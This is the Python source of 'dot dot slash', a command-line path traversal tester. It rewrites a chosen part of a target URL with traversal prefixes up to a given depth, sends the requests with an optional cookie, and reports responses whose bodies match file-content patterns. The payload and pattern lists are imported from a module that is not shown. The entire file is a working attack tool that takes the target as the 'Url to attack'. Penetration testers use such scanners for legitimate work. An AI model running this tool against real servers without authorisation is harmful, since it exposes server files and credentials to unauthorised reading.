#!/usr/bin/python3
import re
import argparse
import sys
from match import dotvar, match, befvar
import requests
from http.cookies import SimpleCookie
# TODO
# add -f --file
# add --os
# http://site.com.br/some-page?page=http://other-site.com.br/
# use POST data
# multiple headers
# solve 302 that turn 200
# save in sqlite/csv
# colors on http_code
# threads
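# Command-line interface. --url and --string are mandatory; --string must be a
# substring of --url because it marks the part of the URL that gets rewritten.
parser = argparse.ArgumentParser(description='dot dot slash - An automated Path Traversal Tester. Created by @jcesarstef.')
parser.add_argument('--url', '-u', action='store', dest='url', required=True, help='Url to attack.')
parser.add_argument('--string', '-s', action='store', dest='string', required=True, help='String in --url to attack. Ex: document.pdf')
parser.add_argument('--cookie', '-c', action='store', dest='cookie', required=False, help='Document cookie.')
# The default is given as an int so it has the same type as a parsed value.
parser.add_argument('--depth', '-d', action='store', dest='depth', required=False, type=int, default=6, help='How deep we will go?')
parser.add_argument('--verbose', '-v', action='store_true', required=False, help='Show requests')
# Parsed once at import time; the rest of the script reads this module-level object.
arguments = parser.parse_args()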
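# Start-up banner. The logo rows are raw strings because the art contains
# backslashes (`\_`, `\|`, `\ `) that are not escape sequences; written in a
# normal literal they trigger invalid-escape warnings on current Python
# versions. Only the ANSI colour codes and newlines use real escapes.
banner = (
    r"_ _ _ _ _ _ " "\n"
    r"__| | ___ | |_ __| | ___ | |_ ___| | __ _ ___| |__ " "\n"
    r"/ _` |/ _ \| __| / _` |/ _ \| __| / __| |/ _` / __| '_ \ " "\n"
    r"| (_| | (_) | |_ | (_| | (_) | |_ \__ \ | (_| \__ \ | | |" "\n"
    r"\__,_|\___/ \__| \__,_|\___/ \__| |___/_|\__,_|___/_| |_|" "\n"
    "\n"
    "Automated Path Traversal Tester\n"
    "version 0.0.2\n"
    "Created by Julio Cesar Stefanutto (@jcesarstef)\n"
    "\n"
    # The target URL is echoed in blue (94) and the colour is reset (0) after it.
    "Starting run in: \033[94m" + arguments.url + "\033[0m\n"
)
print(banner)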
class bcolors:
    """ANSI SGR escape sequences used to colour the terminal output."""

    # Bright foreground colours.
    HEADER = "\x1b[95m"     # bright magenta
    OKBLUE = "\x1b[94m"     # bright blue
    OKGREEN = "\x1b[92m"    # bright green
    WARNING = "\x1b[93m"    # bright yellow
    FAIL = "\x1b[91m"       # bright red

    # Attribute control.
    ENDC = "\x1b[0m"        # reset every attribute
    BOLD = "\x1b[1m"
    UNDERLINE = "\x1b[4m"
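class request(object):
    """Holds the outcome of a single HTTP GET.

    After ``query()`` returns, ``raw`` is the response body as text and
    ``code`` is the HTTP status code.
    """

    def query(self, url, cookie=None, timeout=10):
        """Fetch *url* once and store the body and status code on the instance.

        Args:
            url: Absolute URL to request.
            cookie: Optional cookie header value such as ``"a=1; b=2"``.
            timeout: Seconds to wait for the server before giving up, so an
                unresponsive host cannot stall the run indefinitely.

        Raises:
            requests.RequestException: on connection errors or timeouts.
        """
        jar = None
        if cookie:
            # SimpleCookie.load() takes the header *value* (name=value pairs),
            # so the string is handed over as given, with no "Cookie: " label.
            parsed = SimpleCookie()
            parsed.load(cookie)
            # requests expects plain name -> value pairs, not Morsel objects.
            jar = {name: morsel.value for name, morsel in parsed.items()}
        # Redirects are not followed: the stored code and body are those of
        # the first response.
        req = requests.get(url, cookies=jar, allow_redirects=False, timeout=timeout)
        self.raw = req.text
        self.code = req.status_code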
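def forloop():
    """Request every rewritten URL up to ``--depth`` and report pattern hits.

    For each depth ``0..arguments.depth`` the marker string in the URL is
    replaced by ``befvar prefix + dotvar * depth + word`` for every word in
    ``match``; the response body is then searched with the regex stored under
    that word. Each distinct URL is requested once. Exits the process if the
    marker string does not occur in the URL.
    """
    if str(arguments.string) not in str(arguments.url):
        sys.exit("String: " + bcolors.WARNING + arguments.string + bcolors.ENDC + " not found in url: " + bcolors.FAIL + arguments.url + "\n")

    # A set gives constant-time duplicate checks and never stores a URL twice.
    seen = set()
    # range() also terminates for a negative --depth, where a `!=` counter
    # loop would never reach its stop value.
    for count in range(arguments.depth + 1):
        print("[+] Depth: " + str(count))
        for var in dotvar:
            for bvar in befvar:
                for word in match.keys():
                    rewrite = bvar + (var * count) + word
                    # Literal replacement, matching the literal `in` check
                    # above: neither the marker nor the replacement is
                    # interpreted as a regular expression.
                    fullrewrite = arguments.url.replace(arguments.string, rewrite)
                    if fullrewrite in seen:
                        continue
                    seen.add(fullrewrite)

                    req = request()
                    try:
                        # Forward --cookie so the option actually takes effect.
                        req.query(fullrewrite, arguments.cookie)
                    except requests.RequestException as err:
                        # One failed request should not abort the whole run.
                        print("[!] " + fullrewrite + " failed: " + str(err))
                        continue

                    catchdata = re.findall(str(match[word]), req.raw)
                    if catchdata:
                        print(bcolors.OKGREEN + "\n[" + str(req.code) + "] " + bcolors.ENDC + fullrewrite)
                        print(" Contents Found: " + str(len(catchdata)))
                    elif arguments.verbose:
                        print("[" + str(req.code) + "] " + fullrewrite)

                    # Show at most seven hits, then an ellipsis marker.
                    # NOTE(review): the matched text comes from the remote
                    # response and is printed unescaped, so control characters
                    # in it reach the terminal.
                    for shown, hit in enumerate(catchdata, start=1):
                        print(" " + bcolors.FAIL + str(hit) + bcolors.ENDC)
                        if shown > 6:
                            print(" [...]")
                            break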
# Module-level call: the scan starts as soon as the script is executed.
forloop()